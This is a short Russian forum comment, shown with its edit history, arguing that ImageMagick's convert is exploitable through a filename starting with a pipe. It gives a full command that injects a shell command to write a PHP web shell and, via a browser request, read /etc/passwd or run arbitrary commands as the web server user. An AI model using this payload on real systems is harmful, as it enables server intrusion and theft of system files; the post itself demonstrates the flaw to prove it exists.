История изменений

Исправление soko1, 30.05.16 19:06 (текущая версия) :

Конечно уязвимость. Подставь например вместо

convert '|echo Hello > hello.txt;' null:

Вот это:

convert '| echo "<?php system(\"cat /etc/passwd\"); ?>" > exec.php;' null:

и вызови через браузер exec.php - получишь содержимое /etc/passwd (или любую другую команду под пользователем веб-сервера).

Исходная версия soko1, 30.05.16 19:04:

Конечно уязвимость. Подставь например вместо

convert '|echo Hello > hello.txt;' null:

Вот это:

convert '| echo "<?php system(\"cat /etc/passwd\"); ?>" > exec.php;' null:

и вызови через браузер exec.php - получишь содержимое /etc/passwd.